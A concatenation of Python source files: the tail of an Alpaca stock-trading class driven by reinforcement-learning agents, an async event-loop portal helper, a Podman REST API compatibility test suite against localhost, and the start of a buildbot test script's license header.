raise ValueError('The DRL library input is NOT supported yet. Please check your input.')
else:
raise ValueError('Agent input is NOT supported yet.')
# connect to Alpaca trading API
try:
self.alpaca = tradeapi.REST(API_KEY, API_SECRET, APCA_API_BASE_URL, 'v2')
except:
raise ValueError('Fail to connect Alpaca. Please check account info and internet connection.')
# read trading time interval
if time_interval == '1s':
self.time_interval = 1
elif time_interval == '5s':
self.time_interval = 5
elif time_interval == '1Min':
self.time_interval = 60
elif time_interval == '5Min':
self.time_interval = 60 * 5
elif time_interval == '15Min':
self.time_interval = 60 * 15
else:
raise ValueError('Time interval input is NOT supported yet.')
# read trading settings
self.tech_indicator_list = tech_indicator_list
self.turbulence_thresh = turbulence_thresh
self.max_stock = max_stock
# initialize account
self.stocks = np.asarray([0] * len(ticker_list)) # stocks holding
self.stocks_cd = np.zeros_like(self.stocks)
self.cash = None # cash record
self.stocks_df = pd.DataFrame(self.stocks, columns=['stocks'], index=ticker_list)
self.asset_list = []
self.price = np.asarray([0] * len(ticker_list))
self.stockUniverse = ticker_list
self.turbulence_bool = 0
self.equities = []
def test_latency(self, test_times=10):
total_time = 0
for i in range(0, test_times):
time0 = time.time()
self.get_state()
time1 = time.time()
temp_time = time1 - time0
total_time += temp_time
latency = total_time / test_times
print('latency for data processing: ', latency)
return latency
def run(self):
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
if (self.timeToClose < (60)):
# Close all positions when 1 minutes til market close.
print("Market closing soon. Stop trading.")
break
'''# Close all positions when 1 minutes til market close.
print("Market closing soon. Closing positions.")
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)'''
else:
trade = threading.Thread(target=self.trade)
trade.start()
trade.join()
last_equity = float(self.alpaca.get_account().last_equity)
cur_time = time.time()
self.equities.append([cur_time, last_equity])
time.sleep(self.time_interval)
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while (not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
def trade(self):
state = self.get_state()
if self.drl_lib == 'elegantrl':
with torch.no_grad():
s_tensor = torch.as_tensor((state,), device=self.device)
a_tensor = self.act(s_tensor)
action = a_tensor.detach().cpu().numpy()[0]
action = (action * self.max_stock).astype(int)
elif self.drl_lib == 'rllib':
action = self.agent.compute_single_action(state)
elif self.drl_lib == 'stable_baselines3':
action = self.model.predict(state)[0]
else:
raise ValueError('The DRL library input is NOT supported yet. Please check your input.')
self.stocks_cd += 1
if self.turbulence_bool == 0:
min_action = 10 # stock_cd
for index in np.where(action < -min_action)[0]: # sell_index:
sell_num_shares = min(self.stocks[index], -action[index])
qty = abs(int(sell_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, self.stockUniverse[index], 'sell', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
for index in np.where(action > min_action)[0]: # buy_index:
if self.cash < 0:
tmp_cash = 0
else:
tmp_cash = self.cash
buy_num_shares = min(tmp_cash // self.price[index], abs(int(action[index])))
qty = abs(int(buy_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, self.stockUniverse[index], 'buy', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
else: # sell all when turbulence
positions = self.alpaca.list_positions()
for position in positions:
if (position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.stocks_cd[:] = 0
def get_state(self):
alpaca = AlpacaProcessor(api=self.alpaca)
price, tech, turbulence = alpaca.fetch_latest_data(ticker_list=self.stockUniverse, time_interval='1Min',
tech_indicator_list=self.tech_indicator_list)
turbulence_bool = 1 if turbulence >= self.turbulence_thresh else 0
turbulence = (self.sigmoid_sign(turbulence, self.turbulence_thresh) * 2 ** -5).astype(np.float32)
tech = tech * 2 ** -7
positions = self.alpaca.list_positions()
stocks = [0] * len(self.stockUniverse)
for position in positions:
ind = self.stockUniverse.index(position.symbol)
stocks[ind] = (abs(int(float(position.qty))))
stocks = np.asarray(stocks, dtype=float)
cash = float(self.alpaca.get_account().cash)
self.cash = cash
self.stocks = stocks
self.turbulence_bool = turbulence_bool
self.price = price
amount = np.array(self.cash * (2 ** -12), dtype=np.float32)
scale = np.array(2 ** -6, dtype=np.float32)
state = np.hstack((amount,
turbulence,
self.turbulence_bool,
price * scale,
self.stocks * scale,
self.stocks_cd,
tech,
)).astype(np.float32)
print(len(self.stockUniverse))
return state
def submitOrder(self, qty, stock, side, resp):
if (qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through.")
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
@staticmethod
def sigmoid_sign(ary, thresh):
def sigmoid(x):
return 1 / (1 + np.exp(-x * np.e)) - 0.5
return sigmoid(ary / thresh) * thresh
class StockEnvEmpty(gym.Env):
# Empty Env used for loading rllib agent
def __init__(self, config):
state_dim = config['state_dim']
action_dim = config['action_dim']
self.env_num = 1
self.max_step = 10000
self.env_name = 'StockEnvEmpty'
self.state_dim = state_dim
self.action_dim = action_dim
self.if_discrete = False
self.target_return = 9999
self.observation_space = gym.spaces.Box(low=-3000, high=3000, shape=(state_dim,), dtype=np.float32)
self.action_space = gym.spaces.Box(low=-1, high=1, shape=(action_dim,), dtype=np.float32)
def reset(self):
return
def step(self, actions):
return
|
portal.py
|
__all__ = ("Portal", "create_portal")
import asyncio
import threading
import typing as t
class Portal:
def __init__(self, stop_event: t.Any) -> None:
"""
The portal for async to sync conversion.
Parameters
----------
stop_event: t.Any
The stop event.
"""
self.loop = asyncio.get_event_loop()
self.stop_event = stop_event
@staticmethod
async def _call(fn: t.Callable, args: t.Any, kwargs: t.Any) -> t.Any:
"""
Call the coroutine.
Parameters
----------
fn: t.Callable
The function to be called.
args: t.Any
The function arguments.
kwargs: t.Any
The function kwargs.
Returns
-------
t.Any
The values returned by the function.
"""
return await fn(*args, **kwargs)
async def _stop(self) -> None:
"""
Set the stop event.
Returns
-------
None
"""
self.stop_event.set()
def call(self, fn: t.Callable, *args, **kwargs) -> t.Any:
"""
Call the coroutine.
Parameters
----------
fn: t.Callable
The function to be called.
Returns
-------
t.Any
The values returned by the function.
"""
return asyncio.run_coroutine_threadsafe(self._call(fn, args, kwargs), self.loop)
def stop(self) -> None:
"""
Call the stop event.
Returns
-------
None
"""
return self.call(self._stop)
def create_portal() -> t.Any:
"""
Create the portal object with function initialized.
Returns
-------
t.Any
The portal object.
Examples
--------
.. code-block:: python
async def test(msg):
await asyncio.sleep(0.5)
print(msg)
return "HELLO " + msg
# It'll run a new event loop in separate thread
portal = create_portal()
# It'll call `test` in the separate thread and return a Future
print(portal.call(test, "WORLD").result())
# Stop the portal.
portal.stop().result()
"""
portal = None
async def wait_stop() -> None:
nonlocal portal
stop_event = asyncio.Event()
portal = Portal(stop_event)
running_event.set()
await stop_event.wait()
def run() -> t.Any:
asyncio.run(wait_stop())
running_event = threading.Event()
thread = threading.Thread(target=run)
thread.start()
running_event.wait()
return portal
|
test_rest_v2_0_0.py
|
import json
import os
import random
import string
import subprocess
import sys
import time
import unittest
from multiprocessing import Process
import requests
from dateutil.parser import parse
from test.apiv2.rest_api import Podman
PODMAN_URL = "http://localhost:8080"
def _url(path):
return PODMAN_URL + "/v2.0.0/libpod" + path
def ctnr(path):
try:
r = requests.get(_url("/containers/json?all=true"))
ctnrs = json.loads(r.text)
except Exception as e:
msg = f"Bad container response: {e}"
if r is not None:
msg = msg + " " + r.text
sys.stderr.write(msg + "\n")
raise
return path.format(ctnrs[0]["Id"])
def validateObjectFields(buffer):
objs = json.loads(buffer)
if not isinstance(objs, dict):
for o in objs:
_ = o["Id"]
else:
_ = objs["Id"]
return objs
class TestApi(unittest.TestCase):
podman = None # initialized podman configuration for tests
service = None # podman service instance
def setUp(self):
super().setUp()
TestApi.podman.run("run", "alpine", "/bin/ls", check=True)
def tearDown(self) -> None:
super().tearDown()
TestApi.podman.run("pod", "rm", "--all", "--force", check=True)
TestApi.podman.run("rm", "--all", "--force", check=True)
@classmethod
def setUpClass(cls):
super().setUpClass()
TestApi.podman = Podman()
TestApi.service = TestApi.podman.open("system", "service", "tcp:localhost:8080", "--time=0")
# give the service some time to be ready...
time.sleep(2)
returncode = TestApi.service.poll()
if returncode is not None:
raise subprocess.CalledProcessError(returncode, "podman system service")
r = requests.post(_url("/images/pull?reference=docker.io%2Falpine%3Alatest"))
if r.status_code != 200:
raise subprocess.CalledProcessError(
r.status_code, f"podman images pull docker.io/alpine:latest {r.text}"
)
@classmethod
def tearDownClass(cls):
TestApi.service.terminate()
stdout, stderr = TestApi.service.communicate(timeout=0.5)
if stdout:
sys.stdout.write("\nService Stdout:\n" + stdout.decode("utf-8"))
if stderr:
sys.stderr.write("\nService Stderr:\n" + stderr.decode("utf-8"))
return super().tearDownClass()
def test_info(self):
r = requests.get(_url("/info"))
self.assertEqual(r.status_code, 200)
self.assertIsNotNone(r.content)
_ = json.loads(r.text)
info = requests.get(PODMAN_URL + "/v1.40/info")
self.assertEqual(info.status_code, 200, info.content)
_ = json.loads(info.text)
def test_events(self):
r = requests.get(_url("/events?stream=false"))
self.assertEqual(r.status_code, 200, r.text)
self.assertIsNotNone(r.content)
report = r.text.splitlines()
self.assertGreater(len(report), 0, "No events found!")
for line in report:
obj = json.loads(line)
# Actor.ID is uppercase for compatibility
self.assertIn("ID", obj["Actor"])
def test_containers(self):
r = requests.get(_url("/containers/json"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
obj = json.loads(r.text)
self.assertEqual(len(obj), 0)
def test_containers_all(self):
r = requests.get(_url("/containers/json?all=true"))
self.assertEqual(r.status_code, 200, r.text)
validateObjectFields(r.text)
def test_inspect_container(self):
r = requests.get(_url(ctnr("/containers/{}/json")))
self.assertEqual(r.status_code, 200, r.text)
obj = validateObjectFields(r.content)
_ = parse(obj["Created"])
def test_stats(self):
r = requests.get(_url(ctnr("/containers/{}/stats?stream=false")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
validateObjectFields(r.text)
def test_delete_containers(self):
r = requests.delete(_url(ctnr("/containers/{}")))
self.assertEqual(r.status_code, 204, r.text)
def test_stop_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_start_containers(self):
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_restart_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/restart")), timeout=5)
self.assertEqual(r.status_code, 204, r.text)
def test_resize(self):
r = requests.post(_url(ctnr("/containers/{}/resize?h=43&w=80")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertEqual(r.text, "", r.text)
def test_attach_containers(self):
self.skipTest("FIXME: Test timeouts")
r = requests.post(_url(ctnr("/containers/{}/attach")), timeout=5)
self.assertIn(r.status_code, (101, 500), r.text)
def test_logs_containers(self):
r = requests.get(_url(ctnr("/containers/{}/logs?stdout=true")))
self.assertEqual(r.status_code, 200, r.text)
# TODO Need to support Docker-py order of network/container creates
def test_post_create_compat_connect(self):
"""Create network and container then connect to network"""
net_default = requests.post(
PODMAN_URL + "/v1.40/networks/create", json={"Name": "TestDefaultNetwork"}
)
self.assertEqual(net_default.status_code, 201, net_default.text)
create = requests.post(
PODMAN_URL + "/v1.40/containers/create?name=postCreateConnect",
json={
"Cmd": ["top"],
"Image": "alpine:latest",
"NetworkDisabled": False,
# FIXME adding these 2 lines cause: (This is sampled from docker-py)
# "network already exists","message":"container
# 01306e499df5441560d70071a54342611e422a94de20865add50a9565fd79fb9 is already connected to CNI
# network \"TestDefaultNetwork\": network already exists"
# "HostConfig": {"NetworkMode": "TestDefaultNetwork"},
# "NetworkingConfig": {"EndpointsConfig": {"TestDefaultNetwork": None}},
# FIXME These two lines cause:
# CNI network \"TestNetwork\" not found","message":"error configuring network namespace for container
# 369ddfa7d3211ebf1fbd5ddbff91bd33fa948858cea2985c133d6b6507546dff: CNI network \"TestNetwork\" not
# found"
# "HostConfig": {"NetworkMode": "TestNetwork"},
# "NetworkingConfig": {"EndpointsConfig": {"TestNetwork": None}},
# FIXME no networking defined cause: (note this error is from the container inspect below)
# "internal libpod error","message":"network inspection mismatch: asked to join 2 CNI network(s) [
# TestDefaultNetwork podman], but have information on 1 network(s): internal libpod error"
},
)
self.assertEqual(create.status_code, 201, create.text)
payload = json.loads(create.text)
self.assertIsNotNone(payload["Id"])
start = requests.post(PODMAN_URL + f"/v1.40/containers/{payload['Id']}/start")
self.assertEqual(start.status_code, 204, start.text)
connect = requests.post(
PODMAN_URL + "/v1.40/networks/TestDefaultNetwork/connect",
json={"Container": payload["Id"]},
)
self.assertEqual(connect.status_code, 200, connect.text)
self.assertEqual(connect.text, "OK\n")
inspect = requests.get(f"{PODMAN_URL}/v1.40/containers/{payload['Id']}/json")
self.assertEqual(inspect.status_code, 200, inspect.text)
payload = json.loads(inspect.text)
self.assertFalse(payload["Config"].get("NetworkDisabled", False))
self.assertEqual(
"TestDefaultNetwork",
payload["NetworkSettings"]["Networks"]["TestDefaultNetwork"]["NetworkID"],
)
# TODO restore this to test, when joining multiple networks possible
# self.assertEqual(
# "TestNetwork",
# payload["NetworkSettings"]["Networks"]["TestNetwork"]["NetworkID"],
# )
# TODO Need to support network aliases
# self.assertIn(
# "test_post_create",
# payload["NetworkSettings"]["Networks"]["TestNetwork"]["Aliases"],
# )
def test_post_create_compat(self):
"""Create network and connect container during create"""
net = requests.post(PODMAN_URL + "/v1.40/networks/create", json={"Name": "TestNetwork"})
self.assertEqual(net.status_code, 201, net.text)
create = requests.post(
PODMAN_URL + "/v1.40/containers/create?name=postCreate",
json={
"Cmd": ["date"],
"Image": "alpine:latest",
"NetworkDisabled": False,
"HostConfig": {"NetworkMode": "TestNetwork"},
},
)
self.assertEqual(create.status_code, 201, create.text)
payload = json.loads(create.text)
self.assertIsNotNone(payload["Id"])
inspect = requests.get(f"{PODMAN_URL}/v1.40/containers/{payload['Id']}/json")
self.assertEqual(inspect.status_code, 200, inspect.text)
payload = json.loads(inspect.text)
self.assertFalse(payload["Config"].get("NetworkDisabled", False))
self.assertEqual(
"TestNetwork",
payload["NetworkSettings"]["Networks"]["TestNetwork"]["NetworkID"],
)
def test_commit(self):
r = requests.post(_url(ctnr("/commit?container={}")))
self.assertEqual(r.status_code, 200, r.text)
obj = json.loads(r.content)
self.assertIsInstance(obj, dict)
self.assertIn("Id", obj)
def test_images_compat(self):
r = requests.get(PODMAN_URL + "/v1.40/images/json")
self.assertEqual(r.status_code, 200, r.text)
# See https://docs.docker.com/engine/api/v1.40/#operation/ImageList
required_keys = (
"Id",
"ParentId",
"RepoTags",
"RepoDigests",
"Created",
"Size",
"SharedSize",
"VirtualSize",
"Labels",
"Containers",
)
objs = json.loads(r.content)
self.assertIn(type(objs), (list,))
for o in objs:
self.assertIsInstance(o, dict)
for k in required_keys:
self.assertIn(k, o)
def test_inspect_image_compat(self):
r = requests.get(PODMAN_URL + "/v1.40/images/alpine/json")
self.assertEqual(r.status_code, 200, r.text)
# See https://docs.docker.com/engine/api/v1.40/#operation/ImageInspect
required_keys = (
"Id",
"Parent",
"Comment",
"Created",
"Container",
"DockerVersion",
"Author",
"Architecture",
"Os",
"Size",
"VirtualSize",
"GraphDriver",
"RootFS",
"Metadata",
)
obj = json.loads(r.content)
self.assertIn(type(obj), (dict,))
for k in required_keys:
self.assertIn(k, obj)
_ = parse(obj["Created"])
def test_delete_image_compat(self):
r = requests.delete(PODMAN_URL + "/v1.40/images/alpine?force=true")
self.assertEqual(r.status_code, 200, r.text)
obj = json.loads(r.content)
self.assertIn(type(obj), (list,))
def test_pull(self):
r = requests.post(_url("/images/pull?reference=alpine"), timeout=15)
self.assertEqual(r.status_code, 200, r.status_code)
text = r.text
keys = {
"error": False,
"id": False,
"images": False,
"stream": False,
}
# Read and record stanza's from pull
for line in str.splitlines(text):
obj = json.loads(line)
key_list = list(obj.keys())
for k in key_list:
keys[k] = True
self.assertFalse(keys["error"], "Expected no errors")
self.assertTrue(keys["id"], "Expected to find id stanza")
self.assertTrue(keys["images"], "Expected to find images stanza")
self.assertTrue(keys["stream"], "Expected to find stream progress stanza's")
def test_search_compat(self):
url = PODMAN_URL + "/v1.40/images/search"
# Had issues with this test hanging when repositories not happy
def do_search1():
payload = {"term": "alpine"}
r = requests.get(url, params=payload, timeout=5)
self.assertEqual(r.status_code, 200, r.text)
objs = json.loads(r.text)
self.assertIn(type(objs), (list,))
def do_search2():
payload = {"term": "alpine", "limit": 1}
r = requests.get(url, params=payload, timeout=5)
self.assertEqual(r.status_code, 200, r.text)
objs = json.loads(r.text)
self.assertIn(type(objs), (list,))
self.assertEqual(len(objs), 1)
def do_search3():
payload = {"term": "alpine", "filters": '{"is-official":["true"]}'}
r = requests.get(url, params=payload, timeout=5)
self.assertEqual(r.status_code, 200, r.text)
objs = json.loads(r.text)
self.assertIn(type(objs), (list,))
# There should be only one offical image
self.assertEqual(len(objs), 1)
def do_search4():
headers = {"X-Registry-Auth": "null"}
payload = {"term": "alpine"}
r = requests.get(url, params=payload, headers=headers, timeout=5)
self.assertEqual(r.status_code, 200, r.text)
def do_search5():
headers = {"X-Registry-Auth": "invalid value"}
payload = {"term": "alpine"}
r = requests.get(url, params=payload, headers=headers, timeout=5)
self.assertEqual(r.status_code, 400, r.text)
search_methods = [do_search1, do_search2, do_search3, do_search4, do_search5]
for search_method in search_methods:
search = Process(target=search_method)
search.start()
search.join(timeout=10)
self.assertFalse(search.is_alive(), "/images/search took too long")
def test_ping(self):
required_headers = (
"API-Version",
"Builder-Version",
"Docker-Experimental",
"Cache-Control",
"Pragma",
"Pragma",
)
def check_headers(req):
for k in required_headers:
self.assertIn(k, req.headers)
r = requests.get(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
self.assertEqual(r.text, "OK")
check_headers(r)
r = requests.head(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
self.assertEqual(r.text, "")
check_headers(r)
r = requests.get(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
self.assertEqual(r.text, "OK")
check_headers(r)
r = requests.head(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
self.assertEqual(r.text, "")
check_headers(r)
def test_history_compat(self):
r = requests.get(PODMAN_URL + "/v1.40/images/alpine/history")
self.assertEqual(r.status_code, 200, r.text)
# See https://docs.docker.com/engine/api/v1.40/#operation/ImageHistory
required_keys = ("Id", "Created", "CreatedBy", "Tags", "Size", "Comment")
objs = json.loads(r.content)
self.assertIn(type(objs), (list,))
for o in objs:
self.assertIsInstance(o, dict)
for k in required_keys:
self.assertIn(k, o)
def test_network_compat(self):
name = "Network_" + "".join(random.choice(string.ascii_letters) for i in range(10))
# Cannot test for 0 existing networks because default "podman" network always exists
create = requests.post(PODMAN_URL + "/v1.40/networks/create", json={"Name": name})
self.assertEqual(create.status_code, 201, create.content)
obj = json.loads(create.content)
self.assertIn(type(obj), (dict,))
self.assertIn("Id", obj)
ident = obj["Id"]
self.assertNotEqual(name, ident)
ls = requests.get(PODMAN_URL + "/v1.40/networks")
self.assertEqual(ls.status_code, 200, ls.content)
objs = json.loads(ls.content)
self.assertIn(type(objs), (list,))
found = False
for network in objs:
if network["Name"] == name:
found = True
self.assertTrue(found, f"Network {name} not found")
inspect = requests.get(PODMAN_URL + f"/v1.40/networks/{ident}")
self.assertEqual(inspect.status_code, 200, inspect.content)
obj = json.loads(create.content)
self.assertIn(type(obj), (dict,))
inspect = requests.delete(PODMAN_URL + f"/v1.40/networks/{ident}")
self.assertEqual(inspect.status_code, 204, inspect.content)
inspect = requests.get(PODMAN_URL + f"/v1.40/networks/{ident}")
self.assertEqual(inspect.status_code, 404, inspect.content)
# network prune
prune_name = "Network_" + "".join(random.choice(string.ascii_letters) for i in range(10))
prune_create = requests.post(
PODMAN_URL + "/v1.40/networks/create", json={"Name": prune_name}
)
self.assertEqual(create.status_code, 201, prune_create.content)
prune = requests.post(PODMAN_URL + "/v1.40/networks/prune")
self.assertEqual(prune.status_code, 200, prune.content)
obj = json.loads(prune.content)
self.assertTrue(prune_name in obj["NetworksDeleted"])
def test_volumes_compat(self):
name = "Volume_" + "".join(random.choice(string.ascii_letters) for i in range(10))
ls = requests.get(PODMAN_URL + "/v1.40/volumes")
self.assertEqual(ls.status_code, 200, ls.content)
# See https://docs.docker.com/engine/api/v1.40/#operation/VolumeList
required_keys = (
"Volumes",
"Warnings",
)
obj = json.loads(ls.content)
self.assertIn(type(obj), (dict,))
for k in required_keys:
self.assertIn(k, obj)
create = requests.post(PODMAN_URL + "/v1.40/volumes/create", json={"Name": name})
self.assertEqual(create.status_code, 201, create.content)
# See https://docs.docker.com/engine/api/v1.40/#operation/VolumeCreate
# and https://docs.docker.com/engine/api/v1.40/#operation/VolumeInspect
required_keys = (
"Name",
"Driver",
"Mountpoint",
"Labels",
"Scope",
"Options",
)
obj = json.loads(create.content)
self.assertIn(type(obj), (dict,))
for k in required_keys:
self.assertIn(k, obj)
self.assertEqual(obj["Name"], name)
inspect = requests.get(PODMAN_URL + f"/v1.40/volumes/{name}")
self.assertEqual(inspect.status_code, 200, inspect.content)
obj = json.loads(create.content)
self.assertIn(type(obj), (dict,))
for k in required_keys:
self.assertIn(k, obj)
rm = requests.delete(PODMAN_URL + f"/v1.40/volumes/{name}")
self.assertEqual(rm.status_code, 204, rm.content)
# recreate volume with data and then prune it
r = requests.post(PODMAN_URL + "/v1.40/volumes/create", json={"Name": name})
self.assertEqual(create.status_code, 201, create.content)
create = json.loads(r.content)
with open(os.path.join(create["Mountpoint"], "test_prune"), "w") as file:
file.writelines(["This is a test\n", "This is a good test\n"])
prune = requests.post(PODMAN_URL + "/v1.40/volumes/prune")
self.assertEqual(prune.status_code, 200, prune.content)
payload = json.loads(prune.content)
self.assertIn(name, payload["VolumesDeleted"])
self.assertGreater(payload["SpaceReclaimed"], 0)
def test_version(self):
r = requests.get(PODMAN_URL + "/v1.40/version")
self.assertEqual(r.status_code, 200, r.content)
r = requests.get(_url("/version"))
self.assertEqual(r.status_code, 200, r.content)
def test_df_compat(self):
r = requests.get(PODMAN_URL + "/v1.40/system/df")
self.assertEqual(r.status_code, 200, r.content)
obj = json.loads(r.content)
self.assertIn("Images", obj)
self.assertIn("Containers", obj)
self.assertIn("Volumes", obj)
self.assertIn("BuildCache", obj)
def test_prune_compat(self):
name = "Ctnr_" + "".join(random.choice(string.ascii_letters) for i in range(10))
r = requests.post(
PODMAN_URL + f"/v1.40/containers/create?name={name}",
json={
"Cmd": ["cp", "/etc/motd", "/motd.size_test"],
"Image": "alpine:latest",
"NetworkDisabled": True,
},
)
self.assertEqual(r.status_code, 201, r.text)
create = json.loads(r.text)
r = requests.post(PODMAN_URL + f"/v1.40/containers/{create['Id']}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.post(PODMAN_URL + f"/v1.40/containers/{create['Id']}/wait")
self.assertEqual(r.status_code, 200, r.text)
wait = json.loads(r.text)
self.assertEqual(wait["StatusCode"], 0, wait["Error"]["Message"])
prune = requests.post(PODMAN_URL + "/v1.40/containers/prune")
self.assertEqual(prune.status_code, 200, prune.status_code)
prune_payload = json.loads(prune.text)
self.assertGreater(prune_payload["SpaceReclaimed"], 0)
self.assertIn(create["Id"], prune_payload["ContainersDeleted"])
# Delete any orphaned containers
r = requests.get(PODMAN_URL + "/v1.40/containers/json?all=true")
self.assertEqual(r.status_code, 200, r.text)
for ctnr in json.loads(r.text):
requests.delete(PODMAN_URL + f"/v1.40/containers/{ctnr['Id']}?force=true")
prune = requests.post(PODMAN_URL + "/v1.40/images/prune")
self.assertEqual(prune.status_code, 200, prune.text)
prune_payload = json.loads(prune.text)
self.assertGreater(prune_payload["SpaceReclaimed"], 0)
# FIXME need method to determine which image is going to be "pruned" to fix test
# TODO should handler be recursive when deleting images?
# self.assertIn(img["Id"], prune_payload["ImagesDeleted"][1]["Deleted"])
self.assertIsNotNone(prune_payload["ImagesDeleted"][1]["Deleted"])
def test_status_compat(self):
r = requests.post(
PODMAN_URL + "/v1.40/containers/create?name=topcontainer",
json={"Cmd": ["top"], "Image": "alpine:latest"},
)
self.assertEqual(r.status_code, 201, r.text)
payload = json.loads(r.text)
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(
PODMAN_URL + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = json.loads(r.text)
self.assertEqual(payload[0]["Status"], "Created")
r = requests.post(PODMAN_URL + f"/v1.40/containers/{container_id}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
PODMAN_URL + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = json.loads(r.text)
self.assertTrue(str(payload[0]["Status"]).startswith("Up"))
r = requests.post(PODMAN_URL + f"/v1.40/containers/{container_id}/pause")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
PODMAN_URL + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = json.loads(r.text)
self.assertTrue(str(payload[0]["Status"]).startswith("Up"))
self.assertTrue(str(payload[0]["Status"]).endswith("(Paused)"))
r = requests.post(PODMAN_URL + f"/v1.40/containers/{container_id}/unpause")
self.assertEqual(r.status_code, 204, r.text)
r = requests.post(PODMAN_URL + f"/v1.40/containers/{container_id}/stop")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
PODMAN_URL + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = json.loads(r.text)
self.assertTrue(str(payload[0]["Status"]).startswith("Exited"))
r = requests.delete(PODMAN_URL + f"/v1.40/containers/{container_id}")
self.assertEqual(r.status_code, 204, r.text)
def test_pod_start_conflict(self):
"""Verify issue #8865"""
pod_name = list()
pod_name.append("Pod_" + "".join(random.choice(string.ascii_letters) for i in range(10)))
pod_name.append("Pod_" + "".join(random.choice(string.ascii_letters) for i in range(10)))
r = requests.post(
_url("/pods/create"),
json={
"name": pod_name[0],
"no_infra": False,
"portmappings": [{"host_ip": "127.0.0.1", "host_port": 8889, "container_port": 89}],
},
)
self.assertEqual(r.status_code, 201, r.text)
r = requests.post(
_url("/containers/create"),
json={
"pod": pod_name[0],
"image": "docker.io/alpine:latest",
"command": ["top"],
},
)
self.assertEqual(r.status_code, 201, r.text)
r = requests.post(
_url("/pods/create"),
json={
"name": pod_name[1],
"no_infra": False,
"portmappings": [{"host_ip": "127.0.0.1", "host_port": 8889, "container_port": 89}],
},
)
self.assertEqual(r.status_code, 201, r.text)
r = requests.post(
_url("/containers/create"),
json={
"pod": pod_name[1],
"image": "docker.io/alpine:latest",
"command": ["top"],
},
)
self.assertEqual(r.status_code, 201, r.text)
r = requests.post(_url(f"/pods/{pod_name[0]}/start"))
self.assertEqual(r.status_code, 200, r.text)
r = requests.post(_url(f"/pods/{pod_name[1]}/start"))
self.assertEqual(r.status_code, 409, r.text)
start = json.loads(r.text)
self.assertGreater(len(start["Errs"]), 0, r.text)
if __name__ == "__main__":
unittest.main()
|
run-buildbot-test.py
|
#!/usr/bin/env python
#
# Copyright (C) 2017 Igalia S.L.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
